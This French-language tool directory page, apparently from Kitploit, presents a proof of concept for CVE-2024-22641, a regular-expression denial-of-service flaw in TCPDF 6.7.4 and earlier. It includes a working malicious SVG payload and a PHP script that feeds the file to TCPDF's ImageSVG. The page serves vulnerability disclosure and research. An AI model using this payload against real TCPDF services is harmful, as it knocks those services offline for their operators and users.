Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22641 — Preuve de concept pour CVE-2024-22641 : vulnérabilité ReDoS dans TCPDF <=6.7.4 déclenchée par des fichiers SVG malveillants, démontrant l'épuisement de la limite de backtracking des expressions régulières. | Kitploit
Outils/GitHubGitHub/zunak/cve-2024-22641
Analyse des VulnérabilitésExploitationSécurité WebFuzzingArticles et RechercheApprentissage et Éducation
GitHubzunak/cve-2024-22641

CVE-2024-22641

Preuve de concept pour CVE-2024-22641 : vulnérabilité ReDoS dans TCPDF <=6.7.4 déclenchée par des fichiers SVG malveillants, démontrant l'épuisement de la limite de backtracking des expressions régulières.

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-22641

Type de vulnérabilité

Déni de service par expression régulière (ReDoS)

Produit et version concernés

TCPDF <= 6.7.4

Vecteur d'attaque

TCPDF analyse un fichier SVG contenant une charge utile malveillante.

Description

La version TCPDF <= 6.7.4 est vulnérable à une attaque ReDoS (déni de service par expression régulière) si elle analyse un fichier SVG non fiable.

Preuve de concept

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php require_once('../tcpdf.php'); // create new PDF document $pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false); // add a page $pdf->AddPage(); $pdf->ImageSVG($file='poc.svg'); ?>

Remarque : La vérification avec preg_last_error() après la ligne de code vulnérable fera sortir l'expression régulière avec PREG_BACKTRACK_LIMIT_ERROR.

Télécharger l’outil